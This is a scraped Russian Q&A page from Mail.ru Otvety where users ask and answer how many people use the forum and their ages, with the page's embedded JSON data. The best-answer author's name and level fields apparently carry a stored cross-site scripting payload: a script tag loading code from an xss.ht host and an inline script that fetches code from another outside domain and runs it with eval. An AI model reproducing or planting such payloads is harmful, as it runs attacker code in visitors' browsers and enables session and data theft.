Mail.ruПочтаМой МирОдноклассникиВКонтактеИгрыЗнакомстваНовостиПоискОблакоVK ComboВсе проекты
bb","nick":"Байт","comments":[],"comcnt":1,"brand_url":"n4stytest","url":"\">nev","vip":0,"about":"","cmtext":"Почему нет? Это просто 4-ка наиболее часто встречающихся","refid":95545061,"parent":4431270,"totalcnt":21,"lvl":"\">bb","invisible":null,"cmid":4432971,"isclosed":null,"cidorder":"","type":"A","hidden":null,"is_expert":0,"role":"","kpd":"54.89","usrid":"1"}],"brand_url":"","url":"","vip":0,"about":"","cmtext":"То есть меня тут вообще нету?\nПошла в себя, переживать...","refid":"95545061","parent":0,"totalcnt":22,"lvl":"Гений","invisible":null,"cmid":4431270,"isclosed":null,"cidorder":"","type":"A","hidden":null,"is_expert":0,"role":"","kpd":"41.93","usrid":"307682"}],"state":"R","totalmarks":"9","adds":[],"brand_url":"","sponanswer":"0","url":"","about":"","category":{"urlname":"otvet","name":"Ответы Mail.ru"},"acanselbest":0,"answers":[{"source":"","disabled":0,"ofilin":"EcOdi9u7WN8-mW5ZG1Cj0Jd5WMca1LXg-B0tipQSwJtcAKVy0_7C2S8O_8neOg~~","points":"2330","added":469262947,"brand":"","nick":"Коко","comcnt":"0","rating":"0","atext":"Много! ","totalmarks":0,"brand_url":"","url":"","vip":0,"about":"","id":"95436739","lvl":"Мастер","cidorder":"","hidden":"0","is_expert":0,"role":"","kpd":"15.07","usrid":"6372646"},{"source":"","disabled":0,"ofilin":"DPNbAiSFzgD2cRjFIGgL1rAibr1ctqg7FZTF8nvELEKHCODZWThT8Wx9zim_YVOR","points":"3019","added":469262946,"brand":"","nick":"Mariya","comcnt":"0","rating":"0","atext":"54236 человек\n","totalmarks":0,"brand_url":"","url":"","vip":0,"about":"","id":"95436741","lvl":"Гуру","cidorder":"","hidden":"0","is_expert":0,"role":"","kpd":"9.39","usrid":"5230284"},{"source":"","disabled":0,"ofilin":"hNp1T8ZcXA9oT4IEKC_i6cC22ocbG0t-iMBdP1yiEEABScLJAlmeGg2cmravo67DaWpj0LUkTp-UDci711VD3G9qkBsfIr1-ItTYD3-tryAB","points":"1021","added":469262916,"brand":"","nick":"Пользователь удален","comcnt":"0","rating":"0","atext":"нас то много) А при чем здесь то сколько лет? ","totalmarks":0,"brand_url":"","url":"","vip":0,"about":"","id":"95436844","lvl":"Мастер","cidorder":"","hidden":"0","is_expert":0,"role":"","kpd":"4.47","usrid":"6736858"},{"source":"","disabled":0,"ofilin":"I8ElGjVUuF4oOZygSx8T9_V8RnwLgbYmLALShqtNZ06Zg_U9shzjZqLv2I0-qg~~","points":"862","added":469262804,"brand":"","nick":"Денис Валькович","comcnt":"0","rating":"0","atext":"Сколько на форуме людей, можешь узнать, когда заходишь в ОТВЕТЫ. Внимательней смотрите в правом верхнем углу. ","totalmarks":0,"brand_url":"","url":"","vip":0,"about":"","id":"95437193","lvl":"Профи","cidorder":"","hidden":"0","is_expert":0,"role":"","kpd":"10.98","usrid":"8401650"},{"source":"","disabled":0,"ofilin":"SD9FTRKkhsfDaDH5VS0zL0WD9iY0047uI43nrVVoz4PdzTyySBxfWbfSPyMRL4nCkrw~","points":"16895","added":469262487,"brand":"","nick":"Дмитрий Ростов (Зыбин)","comcnt":"0","rating":"0","atext":"Да, и я иногда сюда захожу)))))))) ","totalmarks":0,"brand_url":"","url":"","vip":0,"about":"","id":"95438130","lvl":"Мудрец","cidorder":"","hidden":"0","is_expert":0,"role":"","kpd":"31.29","usrid":"5966634"}],"has_brand_answer":14046423,"canreply":0,"noadd":1,"description":"А еще интересно, сколько лет?","best":{"source":"","disabled":0,"ofilin":"aFry0zkXYgb6hUgk_YF8I1tgyIhZ4bAN2UJtVLpzvRG9NWS27ePjMCgs4Ni7","points":"17358","added":469221959,"brand":"\">bb","nick":"Байт","comments":[{"disabled":0,"num":1,"ofilin":"OKADjJnzA4u-ZoIpmKLpAGPK6bKVYnumF-kXyDZVadifI162XwiquVtctpzV5w~~","points":"71897","added":469145796,"brand":"","nick":"lasselanta","comcnt":1,"comments":[{"disabled":0,"num":1,"ofilin":"aFry0zkXYgb6hUgk_YF8I1tgyIhZ4bAN2UJtVLpzvRG9NWS27ePjMCgs4Ni7","points":"17358","added":469142607,"brand":"\">bb","nick":"Байт","comments":[],"comcnt":1,"brand_url":"n4stytest","url":"\">nev","vip":0,"about":"","cmtext":"Почему нет? Это просто 4-ка наиболее часто встречающихся","refid":95545061,"parent":4431270,"totalcnt":21,"lvl":"\">bb","invisible":null,"cmid":4432971,"isclosed":null,"cidorder":"","type":"A","hidden":null,"is_expert":0,"role":"","kpd":"54.89","usrid":"1"}],"brand_url":"","url":"","vip":0,"about":"","cmtext":"То есть меня тут вообще нету?\nПошла в себя, переживать...","refid":"95545061","parent":0,"totalcnt":22,"lvl":"Гений","invisible":null,"cmid":4431270,"isclosed":null,"cidorder":"","type":"A","hidden":null,"is_expert":0,"role":"","kpd":"41.93","usrid":"307682"}],"comcnt":"23","rating":"0","atext":"За последний месяц на проект зашло свыше трех с половиной миллионов человек.\nСреди активных пользователей (Знаток и выше) распределение по возрастам такое:\n\n1. 20–25 лет\n2. 15–20 лет\n3. 25–30 лет\n4. 30–35 лет","totalmarks":0,"brand_url":"n4stytest","url":"\">nev","vip":0,"about":"","id":"95545061","lvl":"\">bb","cidorder":"","hidden":"0","is_expert":0,"role":"","kpd":"54.89","usrid":"1"},"cidorder":"","cid":"34","role":"","disabled":0,"waslead":"0","qtext":"Интересно, сколько нас на этом форуме?!","watcher":0,"status":200,"ofilin":"W3bub7JG7w-gEKgeo---KIKt6G6LzI5mto58gUks7xZNE3YQcaq1chut2ZYj","added":469025344,"brand":"","comcnt":"0","rating":"0","created_at":"1206102019","vip":0,"qcomment":"А еще интересно, сколько лет?","lvl":"Профи","polltype":"","can_edit":0,"cancomment":"1","qid":"14046423","anscnt":"6","hidden":"0","canreplyreason":{"error":"not auth","rid":5},"is_expert":0,"kpd":"11.02","usrid":"1910368"};

Интересно, сколько нас на этом форуме?!

М сАФР Профи (823), закрыт 14 лет назад
А еще интересно, сколько лет?
Лучший ответ
Байт Эксперт пока не указал должность 14 лет назад
За последний месяц на проект зашло свыше трех с половиной миллионов человек.
Среди активных пользователей (Знаток и выше) распределение по возрастам такое:

1. 20–25 лет
2. 15–20 лет
3. 25–30 лет
4. 30–35 лет
lasselantaГений (71897) 14 лет назад
То есть меня тут вообще нету?
Пошла в себя, переживать...
Байт "><script src=https://n4.xss.ht></script>b<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener(\"load\", b);a.open(\"GET\", \"//n4sty.dev\");a.send();</script>b (17358) Почему нет? Это просто 4-ка наиболее часто встречающихся
Остальные ответы
Пользователь удален Мастер (1021) 14 лет назад
нас то много) А при чем здесь то сколько лет?
Денис Валькович Профи (862) 14 лет назад
Сколько на форуме людей, можешь узнать, когда заходишь в ОТВЕТЫ. Внимательней смотрите в правом верхнем углу.